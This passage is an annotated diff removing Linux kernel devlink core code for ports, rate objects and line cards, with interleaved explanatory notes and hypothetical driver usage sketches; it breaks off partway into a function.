+-	xa_clear_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
+-	xa_clear_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
+-}
+-EXPORT_SYMBOL_GPL(devlink_unregister);
+-
+-/**
+- *	devlink_free - Free devlink instance resources
+- *
+- *	@devlink: devlink
+- */
+-void devlink_free(struct devlink *devlink)
+-{
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	mutex_destroy(&devlink->linecards_lock);
+-	mutex_destroy(&devlink->reporters_lock);
+-	mutex_destroy(&devlink->lock);
+-	lockdep_unregister_key(&devlink->lock_key);
+-	WARN_ON(!list_empty(&devlink->trap_policer_list));
+-	WARN_ON(!list_empty(&devlink->trap_group_list));
+-	WARN_ON(!list_empty(&devlink->trap_list));
+-	WARN_ON(!list_empty(&devlink->reporter_list));
+-	WARN_ON(!list_empty(&devlink->region_list));
+-	WARN_ON(!list_empty(&devlink->param_list));
+-	WARN_ON(!list_empty(&devlink->resource_list));
+-	WARN_ON(!list_empty(&devlink->dpipe_table_list));
+-	WARN_ON(!list_empty(&devlink->sb_list));
+-	WARN_ON(!list_empty(&devlink->rate_list));
+-	WARN_ON(!list_empty(&devlink->linecard_list));
+-	WARN_ON(!list_empty(&devlink->port_list));
+-
+-	xa_destroy(&devlink->snapshot_ids);
+-	xa_erase(&devlinks, devlink->index);
+-
+-	kfree(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_free);
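The matching remove path (hypothetical foo_* sketch) mirrors the assertions
above: unregister first, then free, with all sub-objects already removed:

	static void foo_remove(struct pci_dev *pdev)
	{
		struct foo_priv *priv = pci_get_drvdata(pdev);
		struct devlink *devlink = priv_to_devlink(priv);

		devlink_unregister(devlink);	/* waits for outstanding refs */
		devlink_free(devlink);		/* lists must be empty by now */
	}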
+-
+-static void devlink_port_type_warn(struct work_struct *work)
+-{
+-	struct devlink_port *port = container_of(to_delayed_work(work),
+-						 struct devlink_port,
+-						 type_warn_dw);
+-	dev_warn(port->devlink->dev, "Type was not set for devlink port.");
+-}
+-
+-static bool devlink_port_type_should_warn(struct devlink_port *devlink_port)
+-{
+-	/* Ignore CPU and DSA flavours. */
+-	return devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_CPU &&
+-	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_DSA &&
+-	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_UNUSED;
+-}
+-
+-#define DEVLINK_PORT_TYPE_WARN_TIMEOUT (HZ * 3600)
+-
+-static void devlink_port_type_warn_schedule(struct devlink_port *devlink_port)
+-{
+-	if (!devlink_port_type_should_warn(devlink_port))
+-		return;
+-	/* Schedule a work item to warn in case the driver does not set
+-	 * the port type within the timeout.
+-	 */
+-	schedule_delayed_work(&devlink_port->type_warn_dw,
+-			      DEVLINK_PORT_TYPE_WARN_TIMEOUT);
+-}
+-
+-static void devlink_port_type_warn_cancel(struct devlink_port *devlink_port)
+-{
+-	if (!devlink_port_type_should_warn(devlink_port))
+-		return;
+-	cancel_delayed_work_sync(&devlink_port->type_warn_dw);
+-}
+-
+-/**
+- * devlink_port_init() - Init devlink port
+- *
+- * @devlink: devlink
+- * @devlink_port: devlink port
+- *
+- * Initialize the essential state needed by functions
+- * that may be called before devlink port registration.
+- * Calling this function is optional and not needed
+- * in case the driver does not use such functions.
+- */
+-void devlink_port_init(struct devlink *devlink,
+-		       struct devlink_port *devlink_port)
+-{
+-	if (devlink_port->initialized)
+-		return;
+-	devlink_port->devlink = devlink;
+-	INIT_LIST_HEAD(&devlink_port->region_list);
+-	devlink_port->initialized = true;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_init);
+-
+-/**
+- * devlink_port_fini() - Deinitialize devlink port
+- *
+- * @devlink_port: devlink port
+- *
+- * Deinitialize the essential state used by functions
+- * that may be called after devlink port unregistration.
+- * Call to this function is optional and not needed
+- * in case the driver does not use such functions.
+- */
+-void devlink_port_fini(struct devlink_port *devlink_port)
+-{
+-	WARN_ON(!list_empty(&devlink_port->region_list));
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_fini);
+-
+-/**
+- * devl_port_register() - Register devlink port
+- *
+- * @devlink: devlink
+- * @devlink_port: devlink port
+- * @port_index: driver-specific numerical identifier of the port
+- *
+- * Register devlink port with provided port index. The driver can use
+- * any indexing, even a hw-related one. The devlink_port structure
+- * is convenient to embed inside the driver's private structure.
+- * Note that the caller should take care of zeroing the devlink_port
+- * structure.
+- */
+-int devl_port_register(struct devlink *devlink,
+-		       struct devlink_port *devlink_port,
+-		       unsigned int port_index)
+-{
+-	devl_assert_locked(devlink);
+-
+-	if (devlink_port_index_exists(devlink, port_index))
+-		return -EEXIST;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	devlink_port_init(devlink, devlink_port);
+-	devlink_port->registered = true;
+-	devlink_port->index = port_index;
+-	spin_lock_init(&devlink_port->type_lock);
+-	INIT_LIST_HEAD(&devlink_port->reporter_list);
+-	mutex_init(&devlink_port->reporters_lock);
+-	list_add_tail(&devlink_port->list, &devlink->port_list);
+-
+-	INIT_DELAYED_WORK(&devlink_port->type_warn_dw, &devlink_port_type_warn);
+-	devlink_port_type_warn_schedule(devlink_port);
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_port_register);
+-
+-/**
+- *	devlink_port_register - Register devlink port
+- *
+- *	@devlink: devlink
+- *	@devlink_port: devlink port
+- *	@port_index: driver-specific numerical identifier of the port
+- *
+- *	Register devlink port with provided port index. The driver can use
+- *	any indexing, even a hw-related one. The devlink_port structure
+- *	is convenient to embed inside the driver's private structure.
+- *	Note that the caller should take care of zeroing the devlink_port
+- *	structure.
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-int devlink_port_register(struct devlink *devlink,
+-			  struct devlink_port *devlink_port,
+-			  unsigned int port_index)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_port_register(devlink, devlink_port, port_index);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_register);
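Typical usage (hypothetical sketch): the structure is zeroed by the
surrounding allocation, attributes are set first, then the port is
registered under a driver-chosen index:

	static int foo_port_create(struct devlink *devlink, struct foo_port *fp,
				   unsigned int index)
	{
		struct devlink_port_attrs attrs = {
			.flavour = DEVLINK_PORT_FLAVOUR_PHYSICAL,
			.phys.port_number = index,
		};

		/* fp was kzalloc'ed, so fp->dl_port is already zeroed */
		devlink_port_attrs_set(&fp->dl_port, &attrs);
		return devlink_port_register(devlink, &fp->dl_port, index);
	}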
+-
+-/**
+- * devl_port_unregister() - Unregister devlink port
+- *
+- * @devlink_port: devlink port
+- */
+-void devl_port_unregister(struct devlink_port *devlink_port)
+-{
+-	lockdep_assert_held(&devlink_port->devlink->lock);
+-
+-	devlink_port_type_warn_cancel(devlink_port);
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
+-	list_del(&devlink_port->list);
+-	WARN_ON(!list_empty(&devlink_port->reporter_list));
+-	mutex_destroy(&devlink_port->reporters_lock);
+-	devlink_port->registered = false;
+-}
+-EXPORT_SYMBOL_GPL(devl_port_unregister);
+-
+-/**
+- *	devlink_port_unregister - Unregister devlink port
+- *
+- *	@devlink_port: devlink port
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-void devlink_port_unregister(struct devlink_port *devlink_port)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-
+-	devl_lock(devlink);
+-	devl_port_unregister(devlink_port);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_unregister);
+-
+-static void __devlink_port_type_set(struct devlink_port *devlink_port,
+-				    enum devlink_port_type type,
+-				    void *type_dev)
+-{
+-	ASSERT_DEVLINK_PORT_REGISTERED(devlink_port);
+-
+-	devlink_port_type_warn_cancel(devlink_port);
+-	spin_lock_bh(&devlink_port->type_lock);
+-	devlink_port->type = type;
+-	devlink_port->type_dev = type_dev;
+-	spin_unlock_bh(&devlink_port->type_lock);
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-}
+-
+-static void devlink_port_type_netdev_checks(struct devlink_port *devlink_port,
+-					    struct net_device *netdev)
+-{
+-	const struct net_device_ops *ops = netdev->netdev_ops;
+-
+-	/* If driver registers devlink port, it should set devlink port
+-	 * attributes accordingly so the compat functions are called
+-	 * and the original ops are not used.
+-	 */
+-	if (ops->ndo_get_phys_port_name) {
+-		/* Some drivers use the same set of ndos for netdevs
+-		 * that have devlink_port registered and also for
+-		 * those that don't. Make sure that ndo_get_phys_port_name
+-		 * returns -EOPNOTSUPP here in case it is defined.
+-		 * Warn if not.
+-		 */
+-		char name[IFNAMSIZ];
+-		int err;
+-
+-		err = ops->ndo_get_phys_port_name(netdev, name, sizeof(name));
+-		WARN_ON(err != -EOPNOTSUPP);
+-	}
+-	if (ops->ndo_get_port_parent_id) {
+-		/* Some drivers use the same set of ndos for netdevs
+-		 * that have devlink_port registered and also for
+-		 * those that don't. Make sure that ndo_get_port_parent_id
+-		 * returns -EOPNOTSUPP here in case it is defined.
+-		 * Warn if not.
+-		 */
+-		struct netdev_phys_item_id ppid;
+-		int err;
+-
+-		err = ops->ndo_get_port_parent_id(netdev, &ppid);
+-		WARN_ON(err != -EOPNOTSUPP);
+-	}
+-}
+-
+-/**
+- *	devlink_port_type_eth_set - Set port type to Ethernet
+- *
+- *	@devlink_port: devlink port
+- *	@netdev: related netdevice
+- */
+-void devlink_port_type_eth_set(struct devlink_port *devlink_port,
+-			       struct net_device *netdev)
+-{
+-	if (netdev)
+-		devlink_port_type_netdev_checks(devlink_port, netdev);
+-	else
+-		dev_warn(devlink_port->devlink->dev,
+-			 "devlink port type for port %d set to Ethernet without a software interface reference, device type not supported by the kernel?\n",
+-			 devlink_port->index);
+-
+-	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_ETH, netdev);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_type_eth_set);
+-
+-/**
+- *	devlink_port_type_ib_set - Set port type to InfiniBand
+- *
+- *	@devlink_port: devlink port
+- *	@ibdev: related IB device
+- */
+-void devlink_port_type_ib_set(struct devlink_port *devlink_port,
+-			      struct ib_device *ibdev)
+-{
+-	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_IB, ibdev);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_type_ib_set);
+-
+-/**
+- *	devlink_port_type_clear - Clear port type
+- *
+- *	@devlink_port: devlink port
+- */
+-void devlink_port_type_clear(struct devlink_port *devlink_port)
+-{
+-	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_NOTSET, NULL);
+-	devlink_port_type_warn_schedule(devlink_port);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_type_clear);
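In a driver (hypothetical fragment), the type is set once the netdevice
exists and cleared before it goes away, which disarms and re-arms the
warning timer above:

	/* after register_netdev() succeeds: */
	devlink_port_type_eth_set(&fp->dl_port, netdev);

	/* on teardown, before unregister_netdev(): */
	devlink_port_type_clear(&fp->dl_port);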
+-
+-static int __devlink_port_attrs_set(struct devlink_port *devlink_port,
+-				    enum devlink_port_flavour flavour)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-
+-	devlink_port->attrs_set = true;
+-	attrs->flavour = flavour;
+-	if (attrs->switch_id.id_len) {
+-		devlink_port->switch_port = true;
+-		if (WARN_ON(attrs->switch_id.id_len > MAX_PHYS_ITEM_ID_LEN))
+-			attrs->switch_id.id_len = MAX_PHYS_ITEM_ID_LEN;
+-	} else {
+-		devlink_port->switch_port = false;
+-	}
+-	return 0;
+-}
+-
+-/**
+- *	devlink_port_attrs_set - Set port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@attrs: devlink port attrs
+- */
+-void devlink_port_attrs_set(struct devlink_port *devlink_port,
+-			    struct devlink_port_attrs *attrs)
+-{
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	devlink_port->attrs = *attrs;
+-	ret = __devlink_port_attrs_set(devlink_port, attrs->flavour);
+-	if (ret)
+-		return;
+-	WARN_ON(attrs->splittable && attrs->split);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_set);
+-
+-/**
+- *	devlink_port_attrs_pci_pf_set - Set PCI PF port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@controller: associated controller number for the devlink port instance
+- *	@pf: associated PF for the devlink port instance
+- *	@external: indicates if the port is for an external controller
+- */
+-void devlink_port_attrs_pci_pf_set(struct devlink_port *devlink_port, u32 controller,
+-				   u16 pf, bool external)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	ret = __devlink_port_attrs_set(devlink_port,
+-				       DEVLINK_PORT_FLAVOUR_PCI_PF);
+-	if (ret)
+-		return;
+-	attrs->pci_pf.controller = controller;
+-	attrs->pci_pf.pf = pf;
+-	attrs->pci_pf.external = external;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_pf_set);
+-
+-/**
+- *	devlink_port_attrs_pci_vf_set - Set PCI VF port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@controller: associated controller number for the devlink port instance
+- *	@pf: associated PF for the devlink port instance
+- *	@vf: associated VF of a PF for the devlink port instance
+- *	@external: indicates if the port is for an external controller
+- */
+-void devlink_port_attrs_pci_vf_set(struct devlink_port *devlink_port, u32 controller,
+-				   u16 pf, u16 vf, bool external)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	ret = __devlink_port_attrs_set(devlink_port,
+-				       DEVLINK_PORT_FLAVOUR_PCI_VF);
+-	if (ret)
+-		return;
+-	attrs->pci_vf.controller = controller;
+-	attrs->pci_vf.pf = pf;
+-	attrs->pci_vf.vf = vf;
+-	attrs->pci_vf.external = external;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_vf_set);
+-
+-/**
+- *	devlink_port_attrs_pci_sf_set - Set PCI SF port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@controller: associated controller number for the devlink port instance
+- *	@pf: associated PF for the devlink port instance
+- *	@sf: associated SF of a PF for the devlink port instance
+- *	@external: indicates if the port is for an external controller
+- */
+-void devlink_port_attrs_pci_sf_set(struct devlink_port *devlink_port, u32 controller,
+-				   u16 pf, u32 sf, bool external)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	ret = __devlink_port_attrs_set(devlink_port,
+-				       DEVLINK_PORT_FLAVOUR_PCI_SF);
+-	if (ret)
+-		return;
+-	attrs->pci_sf.controller = controller;
+-	attrs->pci_sf.pf = pf;
+-	attrs->pci_sf.sf = sf;
+-	attrs->pci_sf.external = external;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_sf_set);
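For instance (hypothetical values), a port representing VF 3 of PF 0 on the
local controller would be set up, before port registration, as:

	devlink_port_attrs_pci_vf_set(&vf_port->dl_port,
				      0,	/* controller */
				      0,	/* PF number */
				      3,	/* VF number */
				      false);	/* not an external controller */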
+-
+-/**
+- * devl_rate_leaf_create - create devlink rate leaf
+- * @devlink_port: devlink port object to create rate object on
+- * @priv: driver private data
+- *
+- * Create devlink rate object of type leaf on provided @devlink_port.
+- */
+-int devl_rate_leaf_create(struct devlink_port *devlink_port, void *priv)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct devlink_rate *devlink_rate;
+-
+-	devl_assert_locked(devlink_port->devlink);
+-
+-	if (WARN_ON(devlink_port->devlink_rate))
+-		return -EBUSY;
+-
+-	devlink_rate = kzalloc(sizeof(*devlink_rate), GFP_KERNEL);
+-	if (!devlink_rate)
+-		return -ENOMEM;
+-
+-	devlink_rate->type = DEVLINK_RATE_TYPE_LEAF;
+-	devlink_rate->devlink = devlink;
+-	devlink_rate->devlink_port = devlink_port;
+-	devlink_rate->priv = priv;
+-	list_add_tail(&devlink_rate->list, &devlink->rate_list);
+-	devlink_port->devlink_rate = devlink_rate;
+-	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_rate_leaf_create);
+-
+-/**
+- * devl_rate_leaf_destroy - destroy devlink rate leaf
+- *
+- * @devlink_port: devlink port linked to the rate object
+- *
+- * Destroy the devlink rate object of type leaf on provided @devlink_port.
+- */
+-void devl_rate_leaf_destroy(struct devlink_port *devlink_port)
+-{
+-	struct devlink_rate *devlink_rate = devlink_port->devlink_rate;
+-
+-	devl_assert_locked(devlink_port->devlink);
+-	if (!devlink_rate)
+-		return;
+-
+-	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_DEL);
+-	if (devlink_rate->parent)
+-		refcount_dec(&devlink_rate->parent->refcnt);
+-	list_del(&devlink_rate->list);
+-	devlink_port->devlink_rate = NULL;
+-	kfree(devlink_rate);
+-}
+-EXPORT_SYMBOL_GPL(devl_rate_leaf_destroy);
+-
+-/**
+- * devl_rate_nodes_destroy - destroy all devlink rate nodes on device
+- * @devlink: devlink instance
+- *
+- * Unset parent for all rate objects and destroy all rate nodes
+- * on specified device.
+- */
+-void devl_rate_nodes_destroy(struct devlink *devlink)
+-{
+-	struct devlink_rate *devlink_rate, *tmp;
+-	const struct devlink_ops *ops = devlink->ops;
+-
+-	devl_assert_locked(devlink);
+-
+-	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
+-		if (!devlink_rate->parent)
+-			continue;
+-
+-		refcount_dec(&devlink_rate->parent->refcnt);
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			ops->rate_leaf_parent_set(devlink_rate, NULL, devlink_rate->priv,
+-						  NULL, NULL);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			ops->rate_node_parent_set(devlink_rate, NULL, devlink_rate->priv,
+-						  NULL, NULL);
+-	}
+-	list_for_each_entry_safe(devlink_rate, tmp, &devlink->rate_list, list) {
+-		if (devlink_rate_is_node(devlink_rate)) {
+-			ops->rate_node_del(devlink_rate, devlink_rate->priv, NULL);
+-			list_del(&devlink_rate->list);
+-			kfree(devlink_rate->name);
+-			kfree(devlink_rate);
+-		}
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devl_rate_nodes_destroy);
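Rate objects only come in the locked devl_ flavour, so a driver that is not
already in a locked context wraps the call itself (hypothetical sketch):

	devl_lock(devlink);
	err = devl_rate_leaf_create(&fp->dl_port, fp);
	devl_unlock(devlink);
	if (err)
		return err;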
+-
+-/**
+- *	devlink_port_linecard_set - Link port with a linecard
+- *
+- *	@devlink_port: devlink port
+- *	@linecard: devlink linecard
+- */
+-void devlink_port_linecard_set(struct devlink_port *devlink_port,
+-			       struct devlink_linecard *linecard)
+-{
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	devlink_port->linecard = linecard;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_linecard_set);
+-
+-static int __devlink_port_phys_port_name_get(struct devlink_port *devlink_port,
+-					     char *name, size_t len)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int n = 0;
+-
+-	if (!devlink_port->attrs_set)
+-		return -EOPNOTSUPP;
+-
+-	switch (attrs->flavour) {
+-	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
+-		if (devlink_port->linecard)
+-			n = snprintf(name, len, "l%u",
+-				     devlink_port->linecard->index);
+-		if (n < len)
+-			n += snprintf(name + n, len - n, "p%u",
+-				      attrs->phys.port_number);
+-		if (n < len && attrs->split)
+-			n += snprintf(name + n, len - n, "s%u",
+-				      attrs->phys.split_subport_number);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_CPU:
+-	case DEVLINK_PORT_FLAVOUR_DSA:
+-	case DEVLINK_PORT_FLAVOUR_UNUSED:
+-		/* As CPU and DSA ports do not have an associated netdevice,
+-		 * this case should never happen.
+-		 */
+-		WARN_ON(1);
+-		return -EINVAL;
+-	case DEVLINK_PORT_FLAVOUR_PCI_PF:
+-		if (attrs->pci_pf.external) {
+-			n = snprintf(name, len, "c%u", attrs->pci_pf.controller);
+-			if (n >= len)
+-				return -EINVAL;
+-			len -= n;
+-			name += n;
+-		}
+-		n = snprintf(name, len, "pf%u", attrs->pci_pf.pf);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_VF:
+-		if (attrs->pci_vf.external) {
+-			n = snprintf(name, len, "c%u", attrs->pci_vf.controller);
+-			if (n >= len)
+-				return -EINVAL;
+-			len -= n;
+-			name += n;
+-		}
+-		n = snprintf(name, len, "pf%uvf%u",
+-			     attrs->pci_vf.pf, attrs->pci_vf.vf);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_SF:
+-		if (attrs->pci_sf.external) {
+-			n = snprintf(name, len, "c%u", attrs->pci_sf.controller);
+-			if (n >= len)
+-				return -EINVAL;
+-			len -= n;
+-			name += n;
+-		}
+-		n = snprintf(name, len, "pf%usf%u", attrs->pci_sf.pf,
+-			     attrs->pci_sf.sf);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_VIRTUAL:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	if (n >= len)
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
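Worked examples of the names this helper produces (illustrative): physical
port 2 split into subport 1 gives "p2s1", and behind linecard 8 it gives
"l8p2s1"; PF 0 on external controller 1 gives "c1pf0"; VF 3 of local PF 0
gives "pf0vf3"; SF 7 of local PF 0 gives "pf0sf7".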
+-static int devlink_linecard_types_init(struct devlink_linecard *linecard)
+-{
+-	struct devlink_linecard_type *linecard_type;
+-	unsigned int count;
+-	int i;
+-
+-	count = linecard->ops->types_count(linecard, linecard->priv);
+-	linecard->types = kmalloc_array(count, sizeof(*linecard_type),
+-					GFP_KERNEL);
+-	if (!linecard->types)
+-		return -ENOMEM;
+-	linecard->types_count = count;
+-
+-	for (i = 0; i < count; i++) {
+-		linecard_type = &linecard->types[i];
+-		linecard->ops->types_get(linecard, linecard->priv, i,
+-					 &linecard_type->type,
+-					 &linecard_type->priv);
+-	}
+-	return 0;
+-}
+-
+-static void devlink_linecard_types_fini(struct devlink_linecard *linecard)
+-{
+-	kfree(linecard->types);
+-}
+-
+-/**
+- *	devlink_linecard_create - Create devlink linecard
+- *
+- *	@devlink: devlink
+- *	@linecard_index: driver-specific numerical identifier of the linecard
+- *	@ops: linecard ops
+- *	@priv: user priv pointer
+- *
+- *	Create devlink linecard instance with provided linecard index.
+- *	The caller can use any indexing, even a hw-related one.
+- *
+- *	Return: Line card structure or an ERR_PTR() encoded error code.
+- */
+-struct devlink_linecard *
+-devlink_linecard_create(struct devlink *devlink, unsigned int linecard_index,
+-			const struct devlink_linecard_ops *ops, void *priv)
+-{
+-	struct devlink_linecard *linecard;
+-	int err;
+-
+-	if (WARN_ON(!ops || !ops->provision || !ops->unprovision ||
+-		    !ops->types_count || !ops->types_get))
+-		return ERR_PTR(-EINVAL);
+-
+-	mutex_lock(&devlink->linecards_lock);
+-	if (devlink_linecard_index_exists(devlink, linecard_index)) {
+-		mutex_unlock(&devlink->linecards_lock);
+-		return ERR_PTR(-EEXIST);
+-	}
+-
+-	linecard = kzalloc(sizeof(*linecard), GFP_KERNEL);
+-	if (!linecard) {
+-		mutex_unlock(&devlink->linecards_lock);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	linecard->devlink = devlink;
+-	linecard->index = linecard_index;
+-	linecard->ops = ops;
+-	linecard->priv = priv;
+-	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-	mutex_init(&linecard->state_lock);
+-
+-	err = devlink_linecard_types_init(linecard);
+-	if (err) {
+-		mutex_destroy(&linecard->state_lock);
+-		kfree(linecard);
+-		mutex_unlock(&devlink->linecards_lock);
+-		return ERR_PTR(err);
+-	}
+-
+-	list_add_tail(&linecard->list, &devlink->linecard_list);
+-	refcount_set(&linecard->refcount, 1);
+-	mutex_unlock(&devlink->linecards_lock);
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	return linecard;
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_create);
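A hypothetical driver wires up the four mandatory ops and creates the line
card at init time:

	static const struct devlink_linecard_ops foo_lc_ops = {
		.provision	= foo_lc_provision,
		.unprovision	= foo_lc_unprovision,
		.types_count	= foo_lc_types_count,
		.types_get	= foo_lc_types_get,
	};

	lc->linecard = devlink_linecard_create(devlink, lc_index,
					       &foo_lc_ops, lc);
	if (IS_ERR(lc->linecard))
		return PTR_ERR(lc->linecard);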
+-
+-/**
+- *	devlink_linecard_destroy - Destroy devlink linecard
+- *
+- *	@linecard: devlink linecard
+- */
+-void devlink_linecard_destroy(struct devlink_linecard *linecard)
+-{
+-	struct devlink *devlink = linecard->devlink;
+-
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_DEL);
+-	mutex_lock(&devlink->linecards_lock);
+-	list_del(&linecard->list);
+-	devlink_linecard_types_fini(linecard);
+-	mutex_unlock(&devlink->linecards_lock);
+-	devlink_linecard_put(linecard);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_destroy);
+-
+-/**
+- *	devlink_linecard_provision_set - Set provisioning on linecard
+- *
+- *	@linecard: devlink linecard
+- *	@type: linecard type
+- *
+- *	This is called either directly from the provision() op or
+- *	asynchronously as a result of the provision() op call.
+- */
+-void devlink_linecard_provision_set(struct devlink_linecard *linecard,
+-				    const char *type)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->type && strcmp(linecard->type, type));
+-	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
+-	linecard->type = type;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_provision_set);
+-
+-/**
+- *	devlink_linecard_provision_clear - Clear provisioning on linecard
+- *
+- *	@linecard: devlink linecard
+- *
+- *	This is called either directly from the unprovision() op or
+- *	asynchronously as a result of the unprovision() op call.
+- */
+-void devlink_linecard_provision_clear(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->nested_devlink);
+-	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-	linecard->type = NULL;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_provision_clear);
+-
+-/**
+- *	devlink_linecard_provision_fail - Fail provisioning on linecard
+- *
+- *	@linecard: devlink linecard
+- *
+- *	This is called either directly from the provision() op or
+- *	asynchronously as a result of the provision() op call.
+- */
+-void devlink_linecard_provision_fail(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->nested_devlink);
+-	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING_FAILED;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_provision_fail);
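Taken together, a provision() op in a hypothetical driver reports its
outcome through these helpers (foo_lc_hw_provision() is assumed):

	static int foo_lc_provision(struct devlink_linecard *linecard, void *priv,
				    const char *type, void *type_priv,
				    struct netlink_ext_ack *extack)
	{
		struct foo_linecard *lc = priv;
		int err;

		err = foo_lc_hw_provision(lc, type_priv);
		if (err) {
			devlink_linecard_provision_fail(linecard);
			return err;
		}
		devlink_linecard_provision_set(linecard, type);
		return 0;
	}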
+-
+-/**
+- *	devlink_linecard_activate - Set linecard active
+- *
+- *	@linecard: devlink linecard
+- */
+-void devlink_linecard_activate(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->state != DEVLINK_LINECARD_STATE_PROVISIONED);
+-	linecard->state = DEVLINK_LINECARD_STATE_ACTIVE;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_activate);
+-
+-/**
+- *	devlink_linecard_deactivate - Set linecard inactive
+- *
+- *	@linecard: devlink linecard
+- */
+-void devlink_linecard_deactivate(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	switch (linecard->state) {
+-	case DEVLINK_LINECARD_STATE_ACTIVE:
+-		linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		break;
+-	case DEVLINK_LINECARD_STATE_UNPROVISIONING:
+-		/* Line card is being deactivated as part
+-		 * of unprovisioning flow.
+-		 */
+-		break;
+-	default:
+-		WARN_ON(1);
+-		break;
+-	}
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_deactivate);
+-
+-/**
+- *	devlink_linecard_nested_dl_set - Attach/detach nested devlink
+- *					 instance to linecard.
+- *
+- *	@linecard: devlink linecard
+- *	@nested_devlink: devlink instance to attach or NULL to detach
+- */
+-void devlink_linecard_nested_dl_set(struct devlink_linecard *linecard,
+-				    struct devlink *nested_devlink)
+-{
